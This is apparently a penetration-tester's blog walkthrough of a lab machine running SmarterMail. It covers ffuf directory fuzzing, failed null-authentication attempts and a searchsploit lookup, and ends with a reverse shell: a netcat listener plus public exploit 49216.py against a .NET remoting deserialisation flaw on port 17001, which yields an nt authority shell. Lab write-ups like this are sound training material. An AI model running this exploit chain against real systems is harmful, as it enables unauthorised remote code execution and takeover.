Z3k0sec's Blog Z3k0sec's Blog: Hacker - Penetration Tester - Security Researcher
Z3k0sec's Blog Z3k0sec's Blog: Hacker - Penetration Tester - Security Researcher
/ z3k0sec's blog
Hacker | Penetration Tester | Security Researcher
19 May 2023
NMAP
PORTS
The Logs directory contains some logs. Download them via mget * and analyse them. We did not find anything of
use, so let’s get out of this potential rabbit hole asap.
v1.5.0
________________________________________________
:: Method : GET
:: URL : http://192.168.232.65/aspnet_client/FUZZ
:: Wordlist : FUZZ: /home/white/SecLists/Discovery/Web-Content/raft-medium-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
After some time enumerating further directories and potential .aspx files, we did not find anything. So let’s move on.
We tried to null authenticate via rpclient, but the server responses with an “access denied” message.
Same thing happens when we try to authenticate via null authentication via crackmapexec smb module:
The only interesting port that stands out is on port 9998. The web application is called “SmarterMail”.
searchsploit smartermail
Since there are multiple hits and have to find out the version that is currently running on the server. (see below)
Inspect the web application’s source code (“View source code”) and we figure it is running on version / build 6919.
(kinda odd naming convention for versioning)
searchsploit -m windows/remote/49216.py
Notice that it mentions a .NET remoting endpoint that is vulnerable to a .NET deserialisation attack. Remember that
port 17001 from the nmap scan we performed earlier? That seems to be such a endpoint. Sweet!
nc -lvnp 9001
python3 49216.py
We receive a connection from the target machine and gain a shell as nt_authority .
proof.txt